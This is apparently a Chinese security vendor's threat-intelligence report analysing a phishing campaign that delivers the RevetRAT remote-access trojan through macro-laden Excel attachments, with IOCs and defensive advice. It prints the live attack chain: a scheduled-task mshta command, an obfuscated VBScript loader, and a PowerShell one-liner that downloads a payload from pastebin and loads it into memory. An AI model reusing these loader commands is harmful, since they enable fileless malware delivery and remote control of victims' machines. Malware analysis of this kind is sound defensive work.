产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
商贸信家族新活跃:利用钓鱼邮件传播商业远控木马RevetRAT
2019-07-30 03:29:11
概述
近期腾讯安全御见威胁情报中心发现商贸信开始传播商业远控木马RevetRAT。
黑客精心构造的带有宏代码的xls文档,作为邮件附件发送至外贸从业人员的邮箱。
当文档被打开时,宏代码执行并获取保存在代码托管平台pastebin上的远程恶意代码,代码执行后继续下载pastebin上保存的二进制数据,然后将其还原成PE文件(远控木马RevetRAT),然后注入Powershell进程执行。
攻击过程无文件落地,中招后会窃取用户隐私信息泄露,同时开启后门。从而造成严重影响。
商贸信传播RevetRAT攻击流程
详细分析
攻击时发送的邮件附件名为Hablem Order List.xls(Hablem的订单清单),该文件为空白excel文件,内有包含了恶意代码的宏。
当用户打开文档,宏代码触发执行如下命令(该命令会被安装为计划任务反复执行):
C:\Windows\System32\schtasks.exe create /sc MINUTE /mo 100 /tn"MicrofoftOffice19" /tr "mshtavbscript:CreateObject("Wscript.Shell").Run("mshta.exehttps[:]//pastebin.com/raw/UwmtjtG9",0,true)(window.close)
利用mshta.exe执行一段经过混淆编码的javascript脚本。多次带参执行unescape( )后得到以下VBScript代码:
"<scriptlanguage="VBScript">
dim PS_le
PS_le = "53 65 74 20 4D 5F 78 61 20 3D20 43 72 65 61 74 65 4F 62 6A 65 63 74 28 53 74 72 52 65 76 65 72 73 65 28 5374 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 65 72 73 65 28 22 6C 6C 65 6853 2E 74 70 69 72 63 53 57 22 29 29 29 29 0D 0A 44 69 6D 20 44 5F 58 41 0D 0A44 5F 58 41 30 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 6572 73 65 28 53 74 72 52 65 76 65 72 73 65 28 22 2F 6D 6F 63 2E 6E 69 62 65 7473 61 70 2F 2F 3A 73 70 74 74 68 27 27 28 67 6E 69 27 2B 27 72 74 53 27 2B 2764 61 6F 6C 6E 27 2B 27 77 6F 44 2E 27 2B 27 29 74 6E 65 69 6C 27 2B 27 43 6265 57 27 2B 27 2E 74 65 4E 27 20 2B 27 29 2A 4F 2D 57 2A 20 4D 43 47 28 26 2827 28 78 65 69 28 78 65 69 20 3D 34 36 63 73 24 5D 5D 5B 65 74 79 42 5B 20 7469 78 65 6F 6E 2D 20 65 78 65 2E 6C 6C 65 68 73 72 65 77 6F 50 22 29 29 29 0D0A 44 5F 58 41 31 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 7665 72 73 65 28 22 72 61 77 2F 79 64 70 70 54 31 70 34 22 29 29 0D 0A 44 5F 5841 32 20 3D 20 53 74 72 52 65 76 65 72 73 65 28 53 74 72 52 65 76 65 72 73 6528 53 74 72 52 65 76 65 72 73 65 28 22 29 58 24 2C 53 24 28 65 6B 6F 76 6E 692E 74 6E 69 6F 50 79 72 74 6E 45 2E 29 34 36 63 73 24 28 64 61 6F 4C 2E 6E 6961 6D 6F 44 74 6E 65 72 72 75 43 3A 3A 5D 6E 69 61 6D 6F 44 70 70 41 5B 3B 2929 27 29 27 27 78 30 27 27 2C 27 27 5E 27 27 28 65 63 61 6C 70 65 72 2E 29 2727 22 29 29 29 0D 0A 44 5F 58 41 20 3D 20 44 5F 58 41 30 20 2B 20 44 5F 58 4131 20 2B 20 44 5F 58 41 32 0D 0A 4D 5F 78 61 2E 52 75 6E 20 44 5F 58 41 2C 2076 62 48 69 64 65"
dim str
Function Mo_Rg(Pin)
Dima : a = Split(Pin)
Dimi
Fori = 0 To UBound(a)
a(i) = Chr("&H" & a(i))
Next
Mo_Rg = Join(a, "")
End Function
str = Mo_Rg(PS_le)
Execute str
self.close
</script>
可以看到该VBScript代码仍然包含混淆,但是在最后的执行前,代码自身会进行还原步骤,还原后结果为”str”。添加创建文本文件的代码,并将”str”的内容写入,运行后可以得到解开混淆后的VBScript:
Set M_xa = CreateObject(StrReverse(StrReverse(StrReverse("llehS.tpircSW"))))
Dim D_XA
D_XA0 = StrReverse(StrReverse(StrReverse("/moc.nibetsap//:sptth''(gni'+'rtS'+'daoln'+'woD.'+')tneil'+'CbeW'+'.teN' +')*O-W* MCG(&('(xei(xei =46cs$]][etyB[ tixeon- exe.llehsrewoP")))
D_XA1 = StrReverse(StrReverse("raw/ydppT1p4"))
D_XA2 = StrReverse(StrReverse(StrReverse(")X$,S$(ekovni.tnioPyrtnE.)46cs$(daoL.niamoDtnerruC::]niamoDppA[;))')''x0'',''^''(ecalper.)''")))
D_XA = D_XA0 + D_XA1 + D_XA2
M_xa.Run D_XA, vbHide
代码字符串翻转函数StrReverse,在执行时将字符串进行翻转,经过翻转调整后,最终执行的WScript.Shell代码为:
Powershell.exe -noexit [Byte[]]$sc64=iex(iex('(&(GCM *W-O*)'+'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''https[:]//pastebin.com/raw/ydppT1p4'').replace(''^'',''0x'')'));[AppDomain]::CurrentDomain.Load($sc64).EntryPoint.invoke($S,$X)
该段代码的功能为下载恶意代码'https[:]//pastebin.com/raw/ydppT1p4,替换掉部分字符得到完整的PE文件数据,然后将其通过内存反射加载至Powershell进程中执行。
远控木马分析
将“ydppT1p4”还原为PE文件后,分析发现作者将木马的主类命名为nuclear_explosion(核爆炸)。通过其C2及互斥变量关联分析,可以确认该样本为远控木马RevetRAT。
RevetRAT木马在2017年3月被国外安全厂商发现。
1. RevetRAT创建以下名称的互斥体以保证在电脑上执行时具有唯一实例。
RV_MUTEX
RV_MUTEX- [RANDOM NAME]
2. RevetRAT还会创建计划任务以达到持久化。在受感染的计算机上打开后门,并连接到远程地址,与硬编码的地址相似的域名还有:
collabora-yehuda.duckdns.org
brokaw.duckdns.org
dodirat.duckdns.org
ubntmanagement.duckdns.org
vazzart.duckdns.org
cloud-neferet.duckdns.org
gjbtulsa.duckdns.org
undefinedx-1.duckdns.org
nullpoo.duckdns.org
tacografo.duckdns.org
...
3. 木马接收C2指令,基于指令在受感染的计算机上执行以下操作:
1)下载文件
2)执行文件
3)更新
4)暂停,重新启动和卸载自身
4. 收集用户信息将其发送到远程地址:
包括本地IP地址,电脑名称,用户名,操作系统,物理内存,安全软件等信息
其部分功能代码如下:
连接C2地址
循环接收数据
解析数据
搜集本地IP
CPU型号
杀软信息
磁盘信息
编码并发送数据
安全建议
1、不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;
2、升级office系列软件到最新版本,不要随意运行不可信文档中的宏;
3、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;
4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统;
IOCs
MD5
264FBADC7B4AFB279DC653A2A2F651B0
89A5569E297B3D8F2F832AA0E010FD45
8EC984FC092F1676714E944C2F0F1482
URL
https[:]//pastebin.com/raw/UwmtjtG9
https[:]//pastebin.com/raw/ydppT1p4
https[:]//pastebin.com/raw/w3Y29LYH
C&C
jigijigi.duckdns.org
collabora-yehuda.duckdns.org
brokaw.duckdns.org
dodirat.duckdns.org
ubntmanagement.duckdns.org
vazzart.duckdns.org
cloud-neferet.duckdns.org
gjbtulsa.duckdns.org
undefinedx-1.duckdns.org
nullpoo.duckdns.org
tacografo.duckdns.org
在线咨询
方案定制